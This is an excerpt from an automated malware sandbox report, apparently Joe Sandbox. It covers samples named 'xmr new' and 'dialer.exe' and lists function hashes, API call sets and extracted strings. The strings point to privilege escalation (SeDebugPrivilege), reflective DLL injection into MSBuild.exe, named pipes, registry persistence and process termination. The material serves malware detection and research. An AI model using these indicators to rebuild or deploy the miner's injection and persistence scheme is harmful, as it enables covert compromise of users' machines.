                          • Instruction ID: 373efbaeee56cd4df186efbf32169bdfa68d2d2d0baaba463729f48fc3055769
                          • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                          • Instruction Fuzzy Hash: 4A51AD361803D0CAFB64AB5594663DE77A2F355B84F184217DF9987B96CB38C4B0C782
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.2217080494.0000012C42A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000012C42A80000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_12c42a80000_xmr new.jbxd
                          Similarity
                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                          • String ID: csm$csm
                          • API String ID: 3896166516-3733052814
                          • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                          • Instruction ID: 1f3b02ed5d8dc2e626ab70b52c658eec3b71c213411d0e96eb23cb1a3d14d578
                          • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                          • Instruction Fuzzy Hash: 8051AF731407C08AFB64AB1591A539E77A2FB54B84F144117DF8947B96CB38D872CB82
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.2216953707.0000012C42A30000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000012C42A30000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_12c42a30000_xmr new.jbxd
                          Similarity
                          • API ID: CurrentImageNonwritable__except_validate_context_record
                          • String ID: csm$f
                          • API String ID: 3242871069-629598281
                          • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                          • Instruction ID: 217ebb9bfe3e7f9364791fbb3e324261f1e888926af483ee17f216feb0b89b74
                          • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                          • Instruction Fuzzy Hash: DE51A9336412808FFB15EB25E426B9E37A7F350B98F518126EF1643788EB34C8608787
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.2216953707.0000012C42A30000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000012C42A30000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_12c42a30000_xmr new.jbxd
                          Similarity
                          • API ID: CurrentImageNonwritable__except_validate_context_record
                          • String ID: csm$f
                          • API String ID: 3242871069-629598281
                          • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                          • Instruction ID: eb86cee583511a069396f2dd03c9fa17206ae54e1e1cc3ea02930369afc8c880
                          • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                          • Instruction Fuzzy Hash: 06319E72241780CAF715EF11E85679E77A6F340B98F158016EF5A03B85DB38C960C787
                          APIs
                          Memory Dump Source
                          • Source File: 00000016.00000002.2217080494.0000012C42A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000012C42A80000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_12c42a80000_xmr new.jbxd
                          Similarity
                          • API ID: FileWrite$ConsoleErrorLastOutput
                          • String ID:
                          • API String ID: 2718003287-0
                          • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                          • Instruction ID: f906c99cf24032752ed5bcbedbee92383b8e242c972a710a2ce55d61db0ccbb0
                          • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                          • Instruction Fuzzy Hash: 98D10032B04A8089F711DFAAD4513DE3BB2F385B98F108616CF5997B99DE34C426D781
                          APIs
                          Memory Dump Source
                          • Source File: 00000016.00000002.2217080494.0000012C42A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000012C42A80000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_12c42a80000_xmr new.jbxd
                          Similarity
                          • API ID: ConsoleErrorLastMode
                          • String ID:
                          • API String ID: 953036326-0
                          • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                          • Instruction ID: d5230eceb0c071f2196f3d1a78958f04e111cc64ee1595023089160414d78892
                          • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                          • Instruction Fuzzy Hash: D191C5327406D085F760AF3694623EE2BE2B754B8CF14490BDF0A57A94DE34C4A6E782
                          APIs
                          Memory Dump Source
                          • Source File: 00000016.00000002.2217080494.0000012C42A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000012C42A80000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_12c42a80000_xmr new.jbxd
                          Similarity
                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                          • String ID:
                          • API String ID: 2933794660-0
                          • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                          • Instruction ID: 3bd38fd944993b491b3cbbd1b23b927e024f024b6da6aa001fcbca1c48079ef4
                          • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                          • Instruction Fuzzy Hash: 7B111C36750F4189FB009B61E8663AE33A4F719B58F440E22DF6D477A4DB78C1A88381
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.2217080494.0000012C42A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000012C42A80000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_12c42a80000_xmr new.jbxd
                          Similarity
                          • API ID: FileType
                          • String ID: \\.\pipe\
                          • API String ID: 3081899298-91387939
                          • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                          • Instruction ID: 640e0e2ad5353589eee4782690a926c67d7035d334bde10d298748b97350fbb4
                          • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                          • Instruction Fuzzy Hash: 3E7192362407C186F725AE26A8663FF67A6F385B88F440027DF0A53B89DE35C566C781
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.2216953707.0000012C42A30000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000012C42A30000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_12c42a30000_xmr new.jbxd
                          Similarity
                          • API ID: CallTranslator
                          • String ID: MOC$RCC
                          • API String ID: 3163161869-2084237596
                          • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                          • Instruction ID: b70efae07e47a05b633f2e383060704492170ab83de7b00d253f6161af5705cb
                          • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                          • Instruction Fuzzy Hash: 72619E33A00B848AFB20EF65D4513DE77A2F348B88F144216EF4917B99DB38D1A5CB85
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.2217080494.0000012C42A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000012C42A80000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_12c42a80000_xmr new.jbxd
                          Similarity
                          • API ID: FileType
                          • String ID: \\.\pipe\
                          • API String ID: 3081899298-91387939
                          • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                          • Instruction ID: 3c8c4a3abb68c98b6a37b1aae2c4fe19a3649003827a33dbb39d5b1b66d75047
                          • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                          • Instruction Fuzzy Hash: 5851C6322847C181F668EA29A4793FFA792F385784F440127DF9A03B59DE3DC52687D2
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.2217080494.0000012C42A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000012C42A80000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_12c42a80000_xmr new.jbxd
                          Similarity
                          • API ID: ErrorFileLastWrite
                          • String ID: U
                          • API String ID: 442123175-4171548499
                          • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                          • Instruction ID: 40132a6a3651bd71a54c6c62f2268012e82cd67c3582f5f66d13962c38308ca9
                          • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                          • Instruction Fuzzy Hash: B141A332714A8086EB20AF26E8553EE77A2F798798F444422EF4D87794EF3CC451D781
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.2217080494.0000012C42A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000012C42A80000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_12c42a80000_xmr new.jbxd
                          Similarity
                          • API ID: ExceptionFileHeaderRaise
                          • String ID: csm
                          • API String ID: 2573137834-1018135373
                          • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                          • Instruction ID: 8aa134b583d5003305a7fc17304788893c1aa239a2a38cff0e7e853950064dd3
                          • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                          • Instruction Fuzzy Hash: 4C115B36604B8082EB20DB15E41039EB7E2FB88B94F184221EF8C07758DF3CC566CB44
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.2216953707.0000012C42A30000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000012C42A30000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_12c42a30000_xmr new.jbxd
                          Similarity
                          • API ID: __std_exception_copy
                          • String ID: ierarchy Descriptor'$riptor at (
                          • API String ID: 592178966-758928094
                          • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                          • Instruction ID: 2a14d563370d01e9914297879026fc74ecbb63f411c6998ba4c33983398ea1d0
                          • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                          • Instruction Fuzzy Hash: DDE08671681B88D0EF019F21E8512DD33A2DB68B64B4891239E5C06311FA38D1F9C341
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.2216953707.0000012C42A30000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000012C42A30000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_12c42a30000_xmr new.jbxd
                          Similarity
                          • API ID: __std_exception_copy
                          • String ID: Locator'$riptor at (
                          • API String ID: 592178966-4215709766
                          • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                          • Instruction ID: b9be9b5e093d8f8472e258c3129dff0aeaf6e6daadb7f070c5e94cbfe91c5ce0
                          • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                          • Instruction Fuzzy Hash: AAE08671651B84D4EF019F21D4511DD7362E768B54B889123DE4C06311EA38D1F5C341
                          APIs
                          Memory Dump Source
                          • Source File: 00000016.00000002.2217080494.0000012C42A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000012C42A80000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_12c42a80000_xmr new.jbxd
                          Similarity
                          • API ID: Heap$Process$AllocFree
                          • String ID:
                          • API String ID: 756756679-0
                          • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                          • Instruction ID: 3c2180239ca0570e48c79ecd267a6b32c5186b1115052a211cba50d5a6a7cc11
                          • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                          • Instruction Fuzzy Hash: A7118235641B8481FA44EB67A4192AE73A2FB89FC0F184026DF4D47765DE38C462D381
                          APIs
                          Memory Dump Source
                          • Source File: 00000016.00000002.2217080494.0000012C42A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000012C42A80000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_12c42a80000_xmr new.jbxd
                          Similarity
                          • API ID: Heap$AllocProcess
                          • String ID:
                          • API String ID: 1617791916-0
                          • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                          • Instruction ID: 37af5e6fa0dadea74f2d86d9ffd1b1174aafd81a2b729b296fba3e457ca98fe1
                          • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                          • Instruction Fuzzy Hash: DCE03935A4164486FB04AB63D82938A36E2EB89F46F1884258F0907361DF7D84A9DB91

                          Execution Graph

                          Execution Coverage:46%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:36.8%
                          Total number of Nodes:223
                          Total number of Limit Nodes:19

                          Memory Dump Source
                          • Source File: 00000033.00000002.2215873737.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 00000033.00000002.2215827680.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                          • Associated: 00000033.00000002.2215906208.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                          • Associated: 00000033.00000002.2215945945.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_51_2_140000000_dialer.jbxd
                          Similarity
                          • API ID: CreateProcess$Close$CurrentHandleResource$FileSecurityThread$DescriptorFreeHeapModuleOpenProtectTokenValueVirtual$AdjustAllocConvertErrorFindInformationLastLibraryLoadLocalLockLookupMappingPrivilegePrivilegesSizeofSleepStringViewlstrcmpi
                          • String ID: D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)$DLL$SOFTWARE\dialerconfig$SeDebugPrivilege$kernel32.dll$ntdll.dll$pid$svc64
                          • API String ID: 4177739653-1130149537
                          • Opcode ID: d90b24f95a95c841a2e029a5b4d6274d008a65fb61feaf57b7d2a555975f1ca1
                          • Instruction ID: c2e61514e361dd61edc66d1a85693de1d2c237bf329a5b31df93bef4cff25afe
                          • Opcode Fuzzy Hash: d90b24f95a95c841a2e029a5b4d6274d008a65fb61feaf57b7d2a555975f1ca1
                          • Instruction Fuzzy Hash: B781E4B6200B4196EB26CF62F8547D977A9F78CBD8F44512AEB4A43A78DF38C148C740

                          Memory Dump Source
                          • Source File: 00000033.00000002.2215873737.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 00000033.00000002.2215827680.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                          • Associated: 00000033.00000002.2215906208.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                          • Associated: 00000033.00000002.2215945945.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_51_2_140000000_dialer.jbxd
                          Similarity
                          • API ID: Process$CloseHandle$Open$InformationToken$AllocAuthorityFileLocalName$CodeCountErrorExitFindFreeLastMemoryModuleObjectPathQuerySingleThreadVirtualWaitWow64Writelstrlen
                          • String ID: @$MSBuild.exe$ReflectiveDllMain$dialer.exe
                          • API String ID: 2561231171-3753927220
                          • Opcode ID: 0577da8a6dab89cee6e9ad54b472e69925a8a9fa9a84297e512ce95199d2773e
                          • Instruction ID: 2175fd9260984ecd3e092ef955109d5d50fbfcc0bf213717558b1eb8b1c9701c
                          • Opcode Fuzzy Hash: 0577da8a6dab89cee6e9ad54b472e69925a8a9fa9a84297e512ce95199d2773e
                          • Instruction Fuzzy Hash: 40B138B260468186EB26DF27F8947E927A9FB8CBC4F404125AF4A477B4EF38C645C740

                          Memory Dump Source
                          • Source File: 00000033.00000002.2215873737.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 00000033.00000002.2215827680.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                          • Associated: 00000033.00000002.2215906208.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                          • Associated: 00000033.00000002.2215945945.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_51_2_140000000_dialer.jbxd
                          Similarity
                          • API ID: Heap$Process$AllocEnumFree$CloseHandleMemoryModulesOpenProcessesRead
                          • String ID:
                          • API String ID: 4084875642-0
                          • Opcode ID: 3ba232721d1513b5cedada72c6e24bd118260bd52d62463099d565cdd5ea385d
                          • Instruction ID: 4858e5a3d965c592fcd1f5951e26bd94c88d4916acf90710a0b336d1aa1e032e
                          • Opcode Fuzzy Hash: 3ba232721d1513b5cedada72c6e24bd118260bd52d62463099d565cdd5ea385d
                          • Instruction Fuzzy Hash: E6519DB2711A819AEB66CF63E8587EA22A5F78DBC4F444025EF4947764DF38C545C700

                          Memory Dump Source
                          • Source File: 00000033.00000002.2215873737.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 00000033.00000002.2215827680.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                          • Associated: 00000033.00000002.2215906208.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                          • Associated: 00000033.00000002.2215945945.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_51_2_140000000_dialer.jbxd
                          Similarity
                          • API ID: DescriptorInitializeSecurity$AllocAllocateCreateDaclEntriesLocalNamedPipe
                          • String ID:
                          • API String ID: 3197395349-0
                          • Opcode ID: 488be1c38cf594ed0d3f6a94cbc7f0150440055c9cb1e58666deddfd8d25be8b
                          • Instruction ID: 21eaad2a8fcaa81d39f01622d1c01d05a8059e075f91819b3ade9b41c51f013a
                          • Opcode Fuzzy Hash: 488be1c38cf594ed0d3f6a94cbc7f0150440055c9cb1e58666deddfd8d25be8b
                          • Instruction Fuzzy Hash: FA318D72215691CAE761CF25F490BDE77A5F748B98F40521AFB4947FA8EB78C208CB40

                          Memory Dump Source
                          • Source File: 00000033.00000002.2215873737.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 00000033.00000002.2215827680.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                          • Associated: 00000033.00000002.2215906208.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                          • Associated: 00000033.00000002.2215945945.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_51_2_140000000_dialer.jbxd
                          Similarity
                          • API ID: FileHandle$CloseCreateModuleProtectVirtual$CurrentFreeInformationLibraryMappingProcessViewlstrcmpi
                          • String ID: .text$C:\Windows\System32\
                          • API String ID: 2721474350-832442975
                          • Opcode ID: ea51ffa9aeaeb0e2cf226d8574d2fabd87300f6e212f2c78447215b36c46b769
                          • Instruction ID: 0b364bd3c89a37fdd3fa7b369e4888cbeb1e5b170dc00cf86e963973e9165d3d
                          • Opcode Fuzzy Hash: ea51ffa9aeaeb0e2cf226d8574d2fabd87300f6e212f2c78447215b36c46b769
                          • Instruction Fuzzy Hash: CC518BB2204B8096EB62CF16F8587DAB3A5F78CBD4F444525AF4A03B68DF38C549C700

                          Memory Dump Source
                          • Source File: 00000033.00000002.2215873737.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 00000033.00000002.2215827680.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                          • Associated: 00000033.00000002.2215906208.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                          • Associated: 00000033.00000002.2215945945.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_51_2_140000000_dialer.jbxd
                          Similarity
                          • API ID: NamedPipe$DescriptorFileInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesLocalReadWrite
                          • String ID: M$\\.\pipe\dialerchildproc64
                          • API String ID: 2203880229-3489460547
                          • Opcode ID: cb78decc689e444f168c8ecd1fa7ab696948f8a3ff5b9be1a13ae3c23ba91d6c
                          • Instruction ID: 6dc3dc8c0bd617ca7cbe615ebfcb02ed857a87361961821bc60a1768ee808972
                          • Opcode Fuzzy Hash: cb78decc689e444f168c8ecd1fa7ab696948f8a3ff5b9be1a13ae3c23ba91d6c
                          • Instruction Fuzzy Hash: C01139B1218A8492F716DB22F8047EE6764A78DBE0F444225BB66036F4DF7CC548C700

                          Memory Dump Source
                          • Source File: 00000033.00000002.2215873737.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 00000033.00000002.2215827680.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                          • Associated: 00000033.00000002.2215906208.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                          • Associated: 00000033.00000002.2215945945.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_51_2_140000000_dialer.jbxd
                          Similarity
                          • API ID: NamedPipe$DescriptorInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesFileLocalRead
                          • String ID: \\.\pipe\dialercontrol_redirect64
                          • API String ID: 2071455217-3440882674
                          • Opcode ID: 0eadeefac485689016ee7cb8901f6413b977b23d4cbf2cacf1e5db6f82192be8
                          • Instruction ID: d66e41e89491d3fe39127ed5f8ff24c46c9ecc4af95d447005e5476a51c55f6d
                          • Opcode Fuzzy Hash: 0eadeefac485689016ee7cb8901f6413b977b23d4cbf2cacf1e5db6f82192be8
                          • Instruction Fuzzy Hash: 42014BB1204A40A2EA17EB63F8443E9B365A79DBE0F144235FB66476F4DF78C488C700

                          Memory Dump Source
                          • Source File: 00000033.00000002.2215873737.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 00000033.00000002.2215827680.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                          • Associated: 00000033.00000002.2215906208.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                          • Associated: 00000033.00000002.2215945945.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_51_2_140000000_dialer.jbxd
                          Similarity
                          • API ID: Heap$AllocProcess$EnumProcessesSleep
                          • String ID:
                          • API String ID: 3676546796-0
                          • Opcode ID: 8f13c2487408d17cabd0d6010e800d760c40d8336c2ba260ca50616313c4bb70
                          • Instruction ID: 9c67988e037e7d22bad9650836966df18df348572cafe7f0e6f30b42da554bff
                          • Opcode Fuzzy Hash: 8f13c2487408d17cabd0d6010e800d760c40d8336c2ba260ca50616313c4bb70
                          • Instruction Fuzzy Hash: 3A115CB26006518AE72ACF17F85579A77A6F78DBC1F154028EB4607B68CF39D881CB40

                          APIs
                          • GetProcessHeap.KERNEL32(?,00000000,?,000000014000238B,?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140001801
                          • HeapAlloc.KERNEL32(?,00000000,?,000000014000238B,?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140001812
                            • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000150B
                            • Part of subcall function 00000001400014D8: HeapAlloc.KERNEL32 ref: 000000014000151E
                            • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000152C
                            • Part of subcall function 00000001400014D8: HeapAlloc.KERNEL32 ref: 000000014000153D
                            • Part of subcall function 00000001400014D8: K32EnumProcesses.KERNEL32 ref: 0000000140001557
                            • Part of subcall function 00000001400014D8: OpenProcess.KERNEL32 ref: 0000000140001585
                            • Part of subcall function 00000001400014D8: K32EnumProcessModules.KERNEL32 ref: 00000001400015AA
                            • Part of subcall function 00000001400014D8: ReadProcessMemory.KERNELBASE ref: 00000001400015E1
                            • Part of subcall function 00000001400014D8: CloseHandle.KERNELBASE ref: 000000014000161D
                            • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000162F
                            • Part of subcall function 00000001400014D8: HeapFree.KERNEL32 ref: 000000014000163D
                            • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 0000000140001643
                            • Part of subcall function 00000001400014D8: HeapFree.KERNEL32 ref: 0000000140001651
                          • OpenProcess.KERNEL32 ref: 0000000140001859
                          • TerminateProcess.KERNELBASE ref: 000000014000186C
                          • CloseHandle.KERNEL32 ref: 0000000140001875
                          • GetProcessHeap.KERNEL32 ref: 0000000140001885
                          Memory Dump Source
                          • Source File: 00000033.00000002.2215873737.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 00000033.00000002.2215827680.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                          • Associated: 00000033.00000002.2215906208.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                          • Associated: 00000033.00000002.2215945945.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_51_2_140000000_dialer.jbxd
                          Similarity
                          • API ID: HeapProcess$Alloc$CloseEnumFreeHandleOpen$MemoryModulesProcessesReadTerminate
                          • String ID:
                          • API String ID: 1323846700-0
                          • Opcode ID: 292de27f87d02887c134cd68883e15ba7f6a186f84d3e8f804eb1f1d2b0452f5
                          • Instruction ID: e8e8f15008253283e0d5a10c8ea57e573901c1344bffe788f1ea91b5e390c365
                          • Opcode Fuzzy Hash: 292de27f87d02887c134cd68883e15ba7f6a186f84d3e8f804eb1f1d2b0452f5
                          • Instruction Fuzzy Hash: C8115BB1B05A4186FB1ADF27F8443D966A6ABCDBC4F188038EF09037B5DE38C5868700

                          Memory Dump Source
                          • Source File: 00000033.00000002.2215873737.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 00000033.00000002.2215827680.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                          • Associated: 00000033.00000002.2215906208.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                          • Associated: 00000033.00000002.2215945945.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_51_2_140000000_dialer.jbxd
                          Similarity
                          • API ID: Process$CloseHandleOpenWow64
                          • String ID:
                          • API String ID: 10462204-0
                          • Opcode ID: 6d646fbe37808f9b584e9cbd293ea6613d1d1a58a609fbda32c726050c0f507a
                          • Instruction ID: a864651f2e5c17a125c4a55b2f5ca9b47fcd1256b8d640ad9fe9232b2a40a049
                          • Opcode Fuzzy Hash: 6d646fbe37808f9b584e9cbd293ea6613d1d1a58a609fbda32c726050c0f507a
                          • Instruction Fuzzy Hash: 77F01D7170578192EB56CF17B584399A665E78CBC0F449039EB8943768DF39C4858700

                          APIs
                            • Part of subcall function 000000014000226C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000228F
                            • Part of subcall function 000000014000226C: OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000229F
                            • Part of subcall function 000000014000226C: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 00000001400022B9
                            • Part of subcall function 000000014000226C: LookupPrivilegeValueW.ADVAPI32 ref: 00000001400022D0
                            • Part of subcall function 000000014000226C: AdjustTokenPrivileges.KERNELBASE ref: 0000000140002308
                            • Part of subcall function 000000014000226C: GetLastError.KERNEL32 ref: 0000000140002312
                            • Part of subcall function 000000014000226C: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000231B
                            • Part of subcall function 000000014000226C: FindResourceExA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000232F
                            • Part of subcall function 000000014000226C: SizeofResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140002346
                            • Part of subcall function 000000014000226C: LoadResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000235F
                            • Part of subcall function 000000014000226C: LockResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140002371
                            • Part of subcall function 000000014000226C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000237E
                            • Part of subcall function 000000014000226C: RegCreateKeyExW.KERNELBASE ref: 00000001400023BE
                            • Part of subcall function 000000014000226C: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32 ref: 00000001400023E5
                            • Part of subcall function 000000014000226C: RegSetKeySecurity.KERNELBASE ref: 00000001400023FE
                            • Part of subcall function 000000014000226C: LocalFree.KERNEL32 ref: 0000000140002408
                          • ExitProcess.KERNEL32 ref: 0000000140002263
                          Memory Dump Source
                          • Source File: 00000033.00000002.2215873737.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
